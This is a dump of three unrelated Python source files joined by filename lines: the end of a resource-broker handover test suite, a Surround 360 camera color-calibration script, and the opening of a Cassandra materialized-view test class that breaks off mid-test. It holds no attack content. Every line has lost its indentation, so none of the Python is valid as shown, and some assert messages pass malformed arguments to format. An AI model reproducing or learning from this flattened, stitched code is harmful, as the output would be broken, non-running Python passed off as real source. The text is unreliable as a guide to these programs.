r = RemoteBroker(address, home=factory.HOME.path)
h,w = r.get_resources({'type':'handset'}, {'type':'workspace'})
w.run('sleep 2') # right, extremely busy, but it prevents other action
p = Process(target=oob_client, args=(handover.address,))
p.start()
# make sure the oob client has gotten its resources
ok = False
for i in range(10):
if len(handover.list_available()) != len(avail):
ok = True
break
time.sleep(0.1)
if not ok:
print('FAIL %s: catastrophic' % pretty)
p.terminate()
p.join()
return False
adoption,config,fdtx_path = handover.begin_handover()
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
handover.end_handover(1)
# now wait for the client to die, so that its session dies, so that
# the takeover detects this, so that the associated resources can be reclaimed,
# so that the takeover's availability is the same as when we started
ok = False
for i in range(10):
if len(takeover.list_available()) == len(avail):
ok = True
break
time.sleep(0.3)
if not ok:
print('FAIL %s: super busy session not tracked correctly' % pretty)
p.terminate()
p.join()
return ok
# check that sessions survive multiple broker restarts
@setup.factory()
def t8(factory):
pretty = '%s t8' % __file__
print(pretty)
original = factory.make_master('master')
avail = original.list_available()
def oob_client(address):
r = RemoteBroker(address, home=factory.HOME.path)
h,w = r.get_resources({'type':'handset'}, {'type':'workspace'})
while True:
time.sleep(1)
p = Process(target=oob_client, args=(original.address,))
p.start()
# make sure the oob client has gotten its resources
ok = False
for i in range(10):
if len(original.list_available()) != len(avail):
ok = True
break
time.sleep(0.1)
if not ok:
print('FAIL %s: catastrophic' % pretty)
p.terminate()
p.join()
return False
# do two handovers in a row
adoption,config,fdtx_path = original.begin_handover()
interim = factory.make_takeover('master', adoption, config, fdtx_path)
original.end_handover(1)
adoption,config,fdtx_path = interim.begin_handover()
final = factory.make_takeover('master', adoption, config, fdtx_path)
interim.end_handover(1)
# check that all brokers have the same availability
a1 = original.list_available()
a2 = interim.list_available()
a3 = final.list_available()
if not (len(a1) == len(a2) == len(a3)):
print(
'FAIL %s: a handover failed somewhere: %s != %s != %s'
% (pretty, a1, a2, a3)
)
p.terminate()
p.join()
return False
# kill the client so that the brokers reclaim the equipment
p.terminate()
p.join()
ok = False
for i in range(10):
a3 = final.list_available()
if len(a3) == len(avail):
ok = True
break
if not ok:
print(
'FAIL %s: wrong availability: %d %d %d %d'
% (pretty, len(a1), len(a2), len(a3), len(avail))
)
return False
# check that the original and interim brokers have terminated now that they
# don't have any sessions with allocations
try:
original.ping() # ping
except Exit, e:
pass # good
except Exception, e:
print('FAIL %s: wrong exception: %s' % (pretty, e))
return False
try:
interim.ping() # ping
except Exit, e:
pass # good
except Exception, e:
print('FAIL %s: wrong exception: %s' % (pretty, e))
return False
return True
# check that clients still attached to the handover get Restarting exceptions
# when they try to allocate after the handover has been done. this *can* be
# fixed so that clients migrate automatically, but it is difficult and I would
# prefer to not implement it unless a strong case can be made for it
@setup.factory()
def t9(factory):
pretty = '%s t9' % __file__
print(pretty)
handover = factory.make_master('master')
client = RemoteBroker(handover.address, home=factory.HOME.path)
# make first allocation
h,w = client.get_resources({'type':'handset'}, {'type':'workspace'})
# hand over
adoption,config,fdtx_path = handover.begin_handover()
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
handover.end_handover(1)
# make second allocation
try:
client.get({'type':'handset'})
print('FAIL %s: second allocation did not fail' % pretty)
return False
except Restarting:
pass # good
except Exception, e:
print('FAIL %s: wrong exception: %s' % (pretty, e))
return False
return True
# check that a restarted share shows up again in its master
@setup.factory()
def t10(factory):
pretty = '%s t10' % __file__
print(pretty)
master = factory.make_master('master')
share = factory.make_share(master, 'share')
share.start_sharing()
time.sleep(1)
client = RemoteBroker(address=master.address, home=factory.HOME.path)
h = client.get_resources({'type':'handset', 'serial':'share-1'})
a1 = master.list_available()
# restart the share
adoption,config,fdtx_path = share.begin_handover()
takeover = factory.make_takeover('share', adoption, config, fdtx_path)
a2 = master.list_available()
if len(a1) == len(a2):
print('FAIL %s: shared resources still visible: %s' % (pretty, a2))
return False
# finish the handover so that takeover can start accepting RPC's. then
# check that the master sees all equipment except the one allocated
share.end_handover(1)
ok = False
for i in range(10):
a3 = master.list_available()
if len(a3) == len(a1):
ok = True
break
time.sleep(0.3)
if not ok:
print('FAIL %s: wrong availability: %s' % (pretty, a3))
return False
for profile in a3:
if 'serial' in profile and profile['serial'] == 'share-1':
print('FAIL %s: busy equipment shared' % pretty)
return False
# finally check that the resource can still be manipulated
try:
p = h.get_profile()
if p['serial'] != 'share-1':
print('FAIL %s: wrong profile: %s' % (pretty, p))
return False
except Exception, e:
print('FAIL %s: unexpected error: %s' % (pretty, e))
return False
return True
# check that shares reconnect to a restarted master
@setup.factory()
def t11(factory):
pretty = '%s t11' % __file__
print(pretty)
master = factory.make_master('master')
share = factory.make_share(master, 'share')
share.start_sharing()
time.sleep(1)
client = RemoteBroker(address=master.address, home=factory.HOME.path)
h1 = client.get_resources({'type':'handset', 'serial':'share-1'})
h2 = client.get_resources({'type':'handset', 'serial':'master-1'})
a1 = master.list_available()
# restart the master
adoption,config,fdtx_path = master.begin_handover()
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
master.end_handover(1)
# connect to the new master and check the availability again
master = RemoteBroker(address=master.address, home=factory.HOME.path)
ok = False
for i in range(10):
a2 = master.list_available()
if len(a2) == len(a1):
ok = True
break
time.sleep(0.3)
if not ok:
print('FAIL %s: wrong availability: %s' % (pretty, a2))
return False
for profile in a2:
if 'serial' in profile and profile['serial'] == 'share-1':
print('FAIL %s: busy equipment shared' % pretty)
return False
return True
# check that .end_handover() doesn't time out even if the takeover did not get
# any sessions to adopt. regression test
@setup.factory()
def t12(factory):
pretty = '%s t12' % __file__
print(pretty)
master = factory.make_master('master')
adoption,config,fdtx_path = master.begin_handover()
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
try:
master.end_handover(1)
except ConnectionClosed:
pass
except Exception, e:
print('FAIL %s: unexpected error: %s' % (pretty, e))
return False
return True
# check that the handover exits when the last session terminates
@setup.factory()
def t13(factory):
pretty = '%s t13' % __file__
print(pretty)
handover = factory.make_master('master')
# make some sessions
c1 = RemoteBroker(handover.address, home=factory.HOME.path)
h1,w1 = c1.get_resources({'type':'handset'}, {'type':'workspace'})
avail_2 = handover.list_available()
c2 = RemoteBroker(handover.address, home=factory.HOME.path)
h2,r2 = c2.get_resources({'type':'handset'}, {'type':'relay'})
avail_3 = handover.list_available()
adoption,config,fdtx_path = handover.begin_handover()
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
handover.end_handover(1)
# crash the sessions
session = RemoteSession(h1.address, h1.authkey)
try:
session.crash()
except ConnectionClosed:
pass
session = RemoteSession(h2.address, h2.authkey)
try:
session.crash()
except ConnectionClosed:
pass
for i in range(10): # wait until only one session remains, then close it
authkeys = handover.get_session_authkeys()
if len(authkeys) == 1:
break
time.sleep(0.3)
# check that the handover sends its exit message when the last session is
# closed
try:
handover.close_session(authkeys[0])
except Exit, e:
if str(e) != 'broker restarted. please reconnect':
print('FAIL %s: wrong exit message: %s' % (pretty, str(e)))
return False
except Exception, e:
print('FAIL %s: wrong exception: %s' % (pretty, e))
return False
try:
handover.ping() # ping
except ConnectionClosed:
pass # good
except Exception, e:
print('FAIL %s: wrong exception: %s' % (pretty, e))
return False
return True
|
color_calibrate_all.py
|
# Copyright (c) 2016-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE_render file in the root directory of this subproject. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
import argparse
import datetime
import json
import os
import re
import subprocess
import sys
import threading
import time
from timeit import default_timer as timer
script_dir = os.path.dirname(os.path.realpath(__file__))
# os.path.dirname(DIR) is the parent directory of DIR
surround360_render_dir = os.path.dirname(script_dir)
TITLE = "Surround 360 - Color Calibration"
COLOR_CALIBRATION_COMMAND_TEMPLATE = """
{SURROUND360_RENDER_DIR}/bin/TestColorCalibration
--image_path "{IMAGE_PATH}"
--illuminant {ILLUMINANT}
--isp_passthrough_path "{ISP_JSON}"
--num_squares_w {NUM_SQUARES_W}
--num_squares_h {NUM_SQUARES_H}
--min_area_chart_perc {MIN_AREA_CHART_PERC}
--max_area_chart_perc {MAX_AREA_CHART_PERC}
--output_data_dir "{OUTPUT_DIR}"
--log_dir "{LOG_DIR}"
--logbuflevel -1
--stderrthreshold 0
{FLAGS_EXTRA}
"""
ILLUMINANTS = ["D50", "D65"]
def list_tiff(src_dir): return [os.path.join(src_dir, fn) for fn in next(os.walk(src_dir))[2] if fn.endswith('.tiff')]
def parse_args():
parse_type = argparse.ArgumentParser
parser = parse_type(description=TITLE, formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--data_dir', help='directory containing raw calibration images', required=True)
parser.add_argument('--output_dir', help='output directory', required=False)
parser.add_argument('--illuminant', help='illuminant', required=False, choices=ILLUMINANTS, default=ILLUMINANTS[0])
parser.add_argument('--black_level_hole', help='if true, get black from black hole in image', action='store_true')
parser.add_argument('--black_level_hole_pixels', help='estimated size of black hole (pixels)', required=False, default=500)
parser.add_argument('--black_level_y_intercept', help='if true, get black level from Y-intercept of RGB response', action='store_true')
parser.add_argument('--black_level_adjust', help='if true, sets each channel black level to median of all cameras', action='store_true')
parser.add_argument('--black_level', help='manual black level', required=False, default='NONE')
parser.add_argument('--num_squares_w', help='number of squares horizontally', required=False, default='6')
parser.add_argument('--num_squares_h', help='number of squares vertically', required=False, default='4')
parser.add_argument('--min_area_chart_perc', help='expected min chart area (% of entire image)', required=False, default='0.5')
parser.add_argument('--max_area_chart_perc', help='expected max chart area (% of entire image)', required=False, default='40.0')
return vars(parser.parse_args())
def start_subprocess(name, cmd):
global current_process
current_process = subprocess.Popen(cmd, shell=True)
current_process.name = name
current_process.communicate()
def print_and_save(file_out, str):
print str
file_out.write(str)
sys.stdout.flush()
def save_step_runtime(file_out, step, runtime_sec):
text_runtime = "\n" + step + " runtime: " + str(datetime.timedelta(seconds=runtime_sec)) + "\n"
file_out.write(text_runtime)
print text_runtime
sys.stdout.flush()
def run_step(step, cmd, file_runtimes):
file_runtimes.write("\n" + cmd + "\n")
print cmd + "\n"
sys.stdout.flush()
start_time = timer()
start_subprocess(step, cmd)
save_step_runtime(file_runtimes, step, timer() - start_time)
def run_threads(thread_list):
for thread in thread_list:
thread.start()
for thread in thread_list:
thread.join()
def median(list):
q, r = divmod(len(list), 2)
return sorted(list)[q] if r else sum(sorted(list)[q - 1:q + 1]) / 2.0
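# Hedged sanity examples for median() above:
#   median([3, 1, 2])    -> 2      (odd length: middle element after sorting)
#   median([4, 1, 3, 2]) -> 2.5    (even length: mean of the two middle elements)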
if __name__ == "__main__":
args = parse_args()
data_dir = args["data_dir"]
illuminant = args["illuminant"]
black_level_hole = args["black_level_hole"]
black_level_hole_pixels = args["black_level_hole_pixels"]
black_level_y_intercept = args["black_level_y_intercept"]
black_level_adjust = args["black_level_adjust"]
black_level = args["black_level"]
num_squares_w = int(args["num_squares_w"])
num_squares_h = int(args["num_squares_h"])
min_area_chart_perc = float(args["min_area_chart_perc"])
max_area_chart_perc = float(args["max_area_chart_perc"])
print "\n--------" + time.strftime(" %a %b %d %Y %H:%M:%S %Z ") + "-------\n"
os.chdir(surround360_render_dir)
if illuminant not in ILLUMINANTS:
sys.stderr.write("Unrecognized illuminant setting: " + illuminant + "\n")
exit(1)
if args["output_dir"] is not None:
out_dir = args["output_dir"]
else:
out_dir = data_dir + "/output"
os.system("mkdir -p \"" + out_dir + "\"")
isp_dir = data_dir + "/isp"
os.system("mkdir -p \"" + isp_dir + "\"")
file_runtimes = open(out_dir + "/runtimes.txt", 'w', 0)
start_time = timer()
isp_passthrough_json = surround360_render_dir + "/res/config/isp/passthrough.json"
raw_charts = list_tiff(data_dir + "/charts")
flags_extra = ""
if black_level_hole:
flags_extra += " --black_level_hole --black_level_hole_pixels " + str(black_level_hole_pixels)
elif black_level_y_intercept:
flags_extra += " --black_level_y_intercept"
elif black_level != 'NONE':
flags_extra += " --black_level \"" + black_level + "\""
flags_extra += " --save_debug_images"
out_dirs = {}
camera_names = {}
thread_list = []
for i in range(len(raw_charts)):
camera_names[i] = os.path.basename(raw_charts[i]).split('.')[0]
out_dirs[i] = out_dir + "/" + camera_names[i]
color_calibrate_params = {
"SURROUND360_RENDER_DIR": surround360_render_dir,
"IMAGE_PATH": raw_charts[i],
"ILLUMINANT": illuminant,
"ISP_JSON": isp_passthrough_json,
"NUM_SQUARES_W": num_squares_w,
"NUM_SQUARES_H": num_squares_h,
"MIN_AREA_CHART_PERC": min_area_chart_perc,
"MAX_AREA_CHART_PERC": max_area_chart_perc,
"OUTPUT_DIR": out_dirs[i],
"LOG_DIR": out_dirs[i],
"FLAGS_EXTRA": flags_extra,
}
color_calibrate_command = COLOR_CALIBRATION_COMMAND_TEMPLATE.replace("\n", " ").format(**color_calibrate_params)
t = threading.Thread(target=run_step, args=(camera_names[i], color_calibrate_command, file_runtimes,))
thread_list.append(t)
run_threads(thread_list)
if black_level_adjust:
### Adapt all cameras to same per-channel black level (median) ###
print "Adjusting black levels...\n"
step = "black_level_adjusted"
NUM_CHANNELS = 3
black_levels = [[] for j in range(NUM_CHANNELS)]
for i in range(len(out_dirs)):
black_level = json.loads(open(out_dirs[i] + "/black_level.txt").read())
print_and_save(file_runtimes, camera_names[i] + ": " + str(black_level) + "\n")
for j in range(NUM_CHANNELS):
black_levels[j].append(black_level[j])
out_dirs[i] += "_" + step
black_level_median = [median(black_levels[j]) for j in range(NUM_CHANNELS)]
print_and_save(file_runtimes, "Black level median: " + str(black_level_median) + "\n")
flags_extra += " --black_level \"" + " ".join(map(str, black_level_median)) + "\""
thread_list = []
for i in range(len(raw_charts)):
color_calibrate_params = {
"SURROUND360_RENDER_DIR": surround360_render_dir,
"IMAGE_PATH": raw_charts[i],
"ILLUMINANT": illuminant,
"ISP_JSON": isp_passthrough_json,
"NUM_SQUARES_W": num_squares_w,
"NUM_SQUARES_H": num_squares_h,
"MIN_AREA_CHART_PERC": min_area_chart_perc,
"MAX_AREA_CHART_PERC": max_area_chart_perc,
"OUTPUT_DIR": out_dirs[i],
"LOG_DIR": out_dirs[i],
"FLAGS_EXTRA": flags_extra,
}
color_calibrate_command = COLOR_CALIBRATION_COMMAND_TEMPLATE.replace("\n", " ").format(**color_calibrate_params)
t = threading.Thread(target=run_step, args=(camera_names[i] + " second pass", color_calibrate_command, file_runtimes,))
thread_list.append(t)
run_threads(thread_list)
print "Finding worst-case X-intercepts...\n"
intercept_x_min = 1.0
intercept_x_max = 0.0
print_and_save(file_runtimes, "\n")
for i in range(len(out_dirs)):
intercepts = json.loads(open(out_dirs[i] + "/intercept_x.txt").read())
print_and_save(file_runtimes, camera_names[i] + ": " + str(intercepts) + "\n")
intercept_x_max = max(intercept_x_max, max(intercepts[0]))
intercept_x_min = min(intercept_x_min, min(intercepts[1]))
text_intercepts = ("Intercept Xmin max: " + str(intercept_x_max) + ", " +
"Intercept Xmax min: " + str(intercept_x_min) + "\n")
print_and_save(file_runtimes, text_intercepts)
thread_list = []
for i in range(len(out_dirs)):
serial_number = re.findall("(\d+)", camera_names[i])[0]
isp_src = out_dirs[i] + "/isp_out.json"
isp_dst = isp_dir + "/" + serial_number + ".json"
print "Copying " + isp_src + " to " + isp_dst + "..."
os.system("cp \"" + isp_src + "\" \"" + isp_dst + "\"")
flags_extra = " --update_clamps --clamp_min " + str(intercept_x_max) + " --clamp_max " + str(intercept_x_min)
color_calibrate_params = {
"SURROUND360_RENDER_DIR": surround360_render_dir,
"IMAGE_PATH": raw_charts[i],
"ILLUMINANT": illuminant,
"ISP_JSON": isp_dst,
"NUM_SQUARES_W": num_squares_w,
"NUM_SQUARES_H": num_squares_h,
"MIN_AREA_CHART_PERC": min_area_chart_perc,
"MAX_AREA_CHART_PERC": max_area_chart_perc,
"OUTPUT_DIR": out_dirs[i],
"LOG_DIR": out_dirs[i],
"FLAGS_EXTRA": flags_extra,
}
color_calibrate_command = COLOR_CALIBRATION_COMMAND_TEMPLATE.replace("\n", " ").format(**color_calibrate_params)
t = threading.Thread(target=run_step, args=(camera_names[i] + " update clamps", color_calibrate_command, file_runtimes,))
thread_list.append(t)
print "Updating ISP clamps..."
run_threads(thread_list)
save_step_runtime(file_runtimes, "TOTAL", timer() - start_time)
file_runtimes.close()
|
materialized_views_test.py
|
import collections
import re
import sys
import time
import traceback
import pytest
import threading
import logging
from flaky import flaky
from enum import Enum
from queue import Empty
from functools import partial
from multiprocessing import Process, Queue
from cassandra import ConsistencyLevel, InvalidRequest, WriteFailure
from cassandra.cluster import NoHostAvailable
from cassandra.concurrent import execute_concurrent_with_args
from cassandra.cluster import Cluster
from cassandra.query import SimpleStatement
from distutils.version import LooseVersion
from dtest import Tester, get_ip_from_node, create_ks
from tools.assertions import (assert_all, assert_crc_check_chance_equal,
assert_invalid, assert_none, assert_one,
assert_unavailable)
from tools.data import rows_to_list
from tools.misc import new_node
from tools.jmxutils import (JolokiaAgent, make_mbean, remove_perf_disable_shared_mem)
since = pytest.mark.since
logger = logging.getLogger(__name__)
# CASSANDRA-10978. Migration wait (in seconds) to use in bootstrapping tests. Needed to handle
# pathological case of flushing schema keyspace for multiple data directories. See CASSANDRA-6696
# for multiple data directory changes and CASSANDRA-10421 for compaction logging that must be
# written.
MIGRATION_WAIT = 5
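# Hedged illustration of how MIGRATION_WAIT is consumed by the bootstrap tests
# below (the node object comes from tools.misc.new_node):
#   node.start(jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])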
@flaky
@since('3.0')
class TestMaterializedViews(Tester):
"""
Test materialized views implementation.
@jira_ticket CASSANDRA-6477
@since 3.0
"""
def _rows_to_list(self, rows):
new_list = [list(row) for row in rows]
return new_list
def prepare(self, user_table=False, rf=1, options=None, nodes=3, install_byteman=False, **kwargs):
cluster = self.cluster
cluster.set_configuration_options({'enable_materialized_views': 'true'})
cluster.populate([nodes, 0], install_byteman=install_byteman)
if options:
cluster.set_configuration_options(values=options)
cluster.start()
node1 = cluster.nodelist()[0]
session = self.patient_cql_connection(node1, **kwargs)
create_ks(session, 'ks', rf)
if user_table:
session.execute(
("CREATE TABLE users (username varchar, password varchar, gender varchar, "
"session_token varchar, state varchar, birth_year bigint, "
"PRIMARY KEY (username));")
)
# create a materialized view
session.execute(("CREATE MATERIALIZED VIEW users_by_state AS "
"SELECT * FROM users WHERE STATE IS NOT NULL AND username IS NOT NULL "
"PRIMARY KEY (state, username)"))
return session
def update_view(self, session, query, flush, compact=False):
session.execute(query)
self._replay_batchlogs()
if flush:
self.cluster.flush()
if compact:
self.cluster.compact()
def _settle_nodes(self):
logger.debug("Settling all nodes")
stage_match = re.compile(r"(?P<name>\S+)\s+(?P<active>\d+)\s+(?P<pending>\d+)\s+(?P<completed>\d+)\s+(?P<blocked>\d+)\s+(?P<alltimeblocked>\d+)")
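# Hedged example of a "nodetool tpstats" line the regex above is meant to match,
# in the order name / active / pending / completed / blocked / all-time blocked
# (numbers are illustrative):
#   MutationStage    0    0    3837    0    0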
def _settled_stages(node):
(stdout, stderr, rc) = node.nodetool("tpstats")
lines = re.split("\n+", stdout)
for line in lines:
match = stage_match.match(line)
if match is not None:
active = int(match.group('active'))
pending = int(match.group('pending'))
if active != 0 or pending != 0:
logger.debug("%s - pool %s still has %d active and %d pending" % (node.name, match.group("name"), active, pending))
return False
return True
for node in self.cluster.nodelist():
if node.is_running():
node.nodetool("replaybatchlog")
attempts = 50 # 100 milliseconds per attempt, so 5 seconds total
while attempts > 0 and not _settled_stages(node):
time.sleep(0.1)
attempts -= 1
def _build_progress_table(self):
if self.cluster.version() >= '4':
return 'system.view_builds_in_progress'
else:
return 'system.views_builds_in_progress'
def _wait_for_view(self, ks, view):
logger.debug("waiting for view")
def _view_build_finished(node):
s = self.patient_exclusive_cql_connection(node)
query = "SELECT * FROM %s WHERE keyspace_name='%s' AND view_name='%s'" %\
(self._build_progress_table(), ks, view)
result = list(s.execute(query))
return len(result) == 0
for node in self.cluster.nodelist():
if node.is_running():
attempts = 50 # 1 sec per attempt, so 50 seconds total
while attempts > 0 and not _view_build_finished(node):
time.sleep(1)
attempts -= 1
if attempts <= 0:
raise RuntimeError("View {}.{} build not finished after 50 seconds.".format(ks, view))
def _wait_for_view_build_start(self, session, ks, view, wait_minutes=2):
"""Wait for the start of a MV build, ensuring that it has saved some progress"""
start = time.time()
while True:
try:
query = "SELECT COUNT(*) FROM %s WHERE keyspace_name='%s' AND view_name='%s'" %\
(self._build_progress_table(), ks, view)
result = list(session.execute(query))
assert 0 == result[0].count
except AssertionError:
break
elapsed = (time.time() - start) / 60
if elapsed > wait_minutes:
self.fail("The MV build hasn't started in 2 minutes.")
def _insert_data(self, session):
# insert data
insert_stmt = "INSERT INTO users (username, password, gender, state, birth_year) VALUES "
session.execute(insert_stmt + "('user1', 'ch@ngem3a', 'f', 'TX', 1968);")
session.execute(insert_stmt + "('user2', 'ch@ngem3b', 'm', 'CA', 1971);")
session.execute(insert_stmt + "('user3', 'ch@ngem3c', 'f', 'FL', 1978);")
session.execute(insert_stmt + "('user4', 'ch@ngem3d', 'm', 'TX', 1974);")
self._settle_nodes()
def _replay_batchlogs(self):
for node in self.cluster.nodelist():
if node.is_running():
logger.debug("Replaying batchlog on node {}".format(node.name))
node.nodetool("replaybatchlog")
# CASSANDRA-13069 - Ensure replayed mutations are removed from the batchlog
node_session = self.patient_exclusive_cql_connection(node)
result = list(node_session.execute("SELECT count(*) FROM system.batches;"))
assert result[0].count == 0
def _assert_view_meta(self, session, views, exists=True, nodes=2):
if exists:
assert_one(session, "SELECT COUNT(*) FROM system.built_views", [views])
if self.cluster.version() >= '3.11':
assert_one(session, "SELECT COUNT(*) FROM system_distributed.view_build_status", [views * nodes])
else:
assert_none(session, "SELECT * FROM system.built_views")
if self.cluster.version() >= '3.11':
assert_none(session, "SELECT * FROM system_distributed.view_build_status")
assert_none(session, "SELECT * FROM {}".format(self._build_progress_table()))
def test_view_metadata_cleanup(self):
"""
drop keyspace or view should clear built_views and view_build_status
"""
session = self.prepare(rf=2, nodes=2)
def populate_data(session, rows):
logger.debug("populate base data")
for v in range(rows):
session.execute("INSERT INTO t(k,c,a,b,e,f) VALUES({v},{v},{v},{v},{v},{v})".format(v=v))
def verify_data(session, rows, views):
logger.debug("verify view data")
for v in range(rows):
for view in range(views):
assert_one(session, "SELECT * FROM mv{} WHERE k={v} AND c={v}".format(view, v=v), [v, v, v, v, v, v])
def create_keyspace(session, ks="ks1", rf=2):
create_ks(session, ks, rf)
def create_table(session):
logger.debug("create base table")
session.execute("CREATE TABLE t (k int, c int, a int, b int, e int, f int, primary key(k, c))")
def create_views(session, views, keyspace="ks1"):
logger.debug("create view")
for view in range(views):
session.execute("CREATE MATERIALIZED VIEW mv{} AS SELECT * FROM t "
"WHERE k IS NOT NULL AND c IS NOT NULL PRIMARY KEY (c,k)".format(view))
for view in range(views):
self._wait_for_view(keyspace, "mv{}".format(view))
def drop_keyspace(session, keyspace="ks1"):
logger.debug("drop keyspace {}".format(keyspace))
session.execute("DROP KEYSPACE IF EXISTS {}".format(keyspace))
def drop_views(session, views):
logger.debug("drop all views")
for view in range(views):
session.execute("DROP MATERIALIZED VIEW IF EXISTS mv{}".format(view))
rows = 100
views = 5
create_keyspace(session)
create_table(session)
populate_data(session, rows)
create_views(session, views)
verify_data(session, rows, views)
self._assert_view_meta(session, views)
drop_keyspace(session)
self._assert_view_meta(session, views, exists=False)
create_keyspace(session)
create_table(session)
populate_data(session, rows)
create_views(session, views)
verify_data(session, rows, views)
self._assert_view_meta(session, views)
drop_views(session, views)
self._assert_view_meta(session, views, exists=False)
def test_create(self):
"""Test the materialized view creation"""
session = self.prepare(user_table=True)
result = list(session.execute(("SELECT * FROM system_schema.views "
"WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
assert len(result) == 1, "Expecting 1 materialized view == got" + str(result)
def test_gcgs_validation(self):
"""Verify that it's not possible to create or set a too low gc_grace_seconds on MVs"""
session = self.prepare(user_table=True)
# Shouldn't be able to alter the gc_grace_seconds of the base table to 0
assert_invalid(session,
"ALTER TABLE users WITH gc_grace_seconds = 0",
"Cannot alter gc_grace_seconds of the base table of a materialized view "
"to 0, since this value is used to TTL undelivered updates. Setting "
"gc_grace_seconds too low might cause undelivered updates to expire "
"before being replayed.")
# But can alter the gc_grace_seconds of the base table to a value != 0
session.execute("ALTER TABLE users WITH gc_grace_seconds = 10")
# Shouldn't be able to alter the gc_grace_seconds of the MV to 0
assert_invalid(session,
"ALTER MATERIALIZED VIEW users_by_state WITH gc_grace_seconds = 0",
"Cannot alter gc_grace_seconds of a materialized view to 0, since "
"this value is used to TTL undelivered updates. Setting gc_grace_seconds "
"too low might cause undelivered updates to expire before being replayed.")
# Now let's drop MV
session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
# Now we should be able to set the gc_grace_seconds of the base table to 0
session.execute("ALTER TABLE users WITH gc_grace_seconds = 0")
# Now we shouldn't be able to create a new MV on this table
assert_invalid(session,
"CREATE MATERIALIZED VIEW users_by_state AS "
"SELECT * FROM users WHERE STATE IS NOT NULL AND username IS NOT NULL "
"PRIMARY KEY (state, username)",
"Cannot create materialized view 'users_by_state' for base table 'users' "
"with gc_grace_seconds of 0, since this value is used to TTL undelivered "
"updates. Setting gc_grace_seconds too low might cause undelivered updates"
" to expire before being replayed.")
def test_insert(self):
"""Test basic insertions"""
session = self.prepare(user_table=True)
self._insert_data(session)
result = list(session.execute("SELECT * FROM users;"))
assert len(result) == 4, "Expecting {} users, got {}".format(4 == len(result))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='TX';"))
assert len(result) == 2, "Expecting {} users, got {}".format(2 == len(result))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='CA';"))
assert len(result) == 1, "Expecting {} users, got {}".format(1 == len(result))
result = list(session.execute("SELECT * FROM users_by_state WHERE state='MA';"))
assert len(result) == 0, "Expecting {} users, got {}".format(0 == len(result))
def test_populate_mv_after_insert(self):
"""Test that a view is OK when created with existing data"""
session = self.prepare(consistency_level=ConsistencyLevel.QUORUM)
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
for i in range(1000):
session.execute("INSERT INTO t (id, v) VALUES ({v}, {v})".format(v=i))
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
"AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("wait for view to build")
self._wait_for_view("ks", "t_by_v")
logger.debug("wait that all batchlogs are replayed")
self._replay_batchlogs()
for i in range(1000):
assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(i), [i, i])
@pytest.mark.xfail(reason="Should be addressed with CASSANDRA-15845")
@since('4.0')
def test_populate_mv_after_insert_wide_rows_version40(self):
self.test_populate_mv_after_insert_wide_rows()
@since('3.0', max_version='3.X')
def test_populate_mv_after_insert_wide_rows(self):
"""Test that a view is OK when created with existing data with wide rows"""
session = self.prepare(consistency_level=ConsistencyLevel.QUORUM)
session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY (id, v))")
for i in range(5):
for j in range(10000):
session.execute("INSERT INTO t (id, v) VALUES ({}, {})".format(i, j))
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
"AND id IS NOT NULL PRIMARY KEY (v, id)"))
logger.debug("wait for view to build")
self._wait_for_view("ks", "t_by_v")
logger.debug("wait that all batchlogs are replayed")
self._replay_batchlogs()
for i in range(5):
for j in range(10000):
assert_one(session, "SELECT * FROM t_by_v WHERE id = {} AND v = {}".format(i, j), [j, i])
def test_crc_check_chance(self):
"""Test that crc_check_chance parameter is properly populated after mv creation and update"""
session = self.prepare()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
"AND id IS NOT NULL PRIMARY KEY (v, id) WITH crc_check_chance = 0.5"))
assert_crc_check_chance_equal(session, "t_by_v", 0.5, view=True)
session.execute("ALTER MATERIALIZED VIEW t_by_v WITH crc_check_chance = 0.3")
assert_crc_check_chance_equal(session, "t_by_v", 0.3, view=True)
def test_prepared_statement(self):
"""Test basic insertions with prepared statement"""
session = self.prepare(user_table=True)
insertPrepared = session.prepare(
"INSERT INTO users (username, password, gender, state, birth_year) VALUES (?, ?, ?, ?, ?);"
)
selectPrepared = session.prepare(
"SELECT state, password, session_token FROM users_by_state WHERE state=?;"
)
# insert data
session.execute(insertPrepared.bind(('user1', 'ch@ngem3a', 'f', 'TX', 1968)))
session.execute(insertPrepared.bind(('user2', 'ch@ngem3b', 'm', 'CA', 1971)))
session.execute(insertPrepared.bind(('user3', 'ch@ngem3c', 'f', 'FL', 1978)))
session.execute(insertPrepared.bind(('user4', 'ch@ngem3d', 'm', 'TX', 1974)))
result = list(session.execute("SELECT * FROM users;"))
assert len(result) == 4, "Expecting {} users, got {}".format(4, len(result))
result = list(session.execute(selectPrepared.bind(['TX'])))
assert len(result) == 2, "Expecting {} users, got {}".format(2, len(result))
result = list(session.execute(selectPrepared.bind(['CA'])))
assert len(result) == 1, "Expecting {} users, got {}".format(1, len(result))
result = list(session.execute(selectPrepared.bind(['MA'])))
assert len(result) == 0, "Expecting {} users, got {}".format(0, len(result))
def test_immutable(self):
"""Test that a materialized view is immutable"""
session = self.prepare(user_table=True)
# cannot insert
assert_invalid(session, "INSERT INTO users_by_state (state, username) VALUES ('TX', 'user1');",
"Cannot directly modify a materialized view")
# cannot update
assert_invalid(session, "UPDATE users_by_state SET session_token='XYZ' WHERE username='user1' AND state = 'TX';",
"Cannot directly modify a materialized view")
# cannot delete a row
assert_invalid(session, "DELETE from users_by_state where state='TX';",
"Cannot directly modify a materialized view")
# cannot delete a cell
